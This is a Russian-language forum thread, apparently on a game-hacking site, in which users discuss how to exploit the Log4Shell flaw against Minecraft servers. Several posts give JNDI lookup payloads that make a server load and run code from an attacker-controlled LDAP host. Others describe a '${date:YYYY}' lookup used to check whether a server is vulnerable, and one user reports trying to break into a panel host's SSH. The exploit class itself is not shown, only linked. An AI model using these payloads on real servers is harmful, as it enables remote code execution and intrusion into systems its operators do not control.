Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: This feature may not be available in some browsers.
ну зачем мне ломать свой пк? я не понимаю этогоПридется открывать IP на компудахтере, что логично хреновый вариант
Объединено
IP бл... порты!
Да какой свой господе! Ну чего не понятного.ну зачем мне ломать свой пк? я не понимаю этого
${jndi:ldap://.ip компа:1398/Log4JCE} обращается к компу на котором сервер Log4JCE? тогда почему на видео ломают свой пк а не сервер?Да какой свой господе! Ну чего не понятного.
${jndi:ldap/urmom.com/log4jtobipizda} = "Привет сервер, выполни код по ссылке urmom.com/log4jtobipizda"
Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?тогда почему на видео ломают свой пк а не сервер?
получается работает так:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?
Ну если мы думаем одинаково то да:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?
ну а то что на видео ломали свой пк:это потому что сервер на их пк работал?Ну если мы думаем одинаково то да
Это по тому что майнкрафт использует ту же систему логгирования что и сервера.это потому что сервер на их пк работал?
Дата выбивалась,буду проверять получится ли ломануть.Это по тому что майнкрафт использует ту же систему логгирования что и сервера.
Объединено
Кароче мы отклонились от темы. Суть проста. Лукапы. /say ${date:YYYY} - лукап. Если лукап работает, т.е. дата выбивается - сервер с вероятностью 90% подвержен взлому.
Ну тут уже надо шаритьДата выбивалась,буду проверять получится ли ломануть.
Ну так да, сервер исполняет этот классне робит,ввожу в консоль:say ${jndi:ldap://ip machine:1389/Log4JCE} выводит это: [Server thread/INFO]: [Server] Reference Class Name: foo
Так что не взломать SSH у панельного хоста.Ну так да, сервер исполняет этот класс
О чем ты думал, если у тебя юзер у которого ни на что нет прав?Так что не взломать SSH у панельного хоста.
мб код не правильный? вбивал в Log4jRCE.java такой код:О чем ты думал, если у тебя юзер у которого ни на что нет прав?
Объединено
При помощи log4shell ты можешь сделать что-то реальное только если сервер запущен от рута или юзера с реальными правами. Если у тебя тупо хост, у которого более чем на запуск сервера ни на что прав нет, то ты ничего не сделаешь.
Если бы так было можно, удалить все сервера можно было бы при помощи обычного плагина и кода Runtime.getRuntime().exec()
Я думаю тебе в даркнет с такими вопросамимб код не правильный? вбивал в Log4jRCE.java такой код:Авторизуйтесь для просмотра ссылок.
Мы используем основные cookies для обеспечения работы этого сайта, а также дополнительные cookies для обеспечения максимального удобства пользователя.
Посмотрите дополнительную информацию и настройте свои предпочтения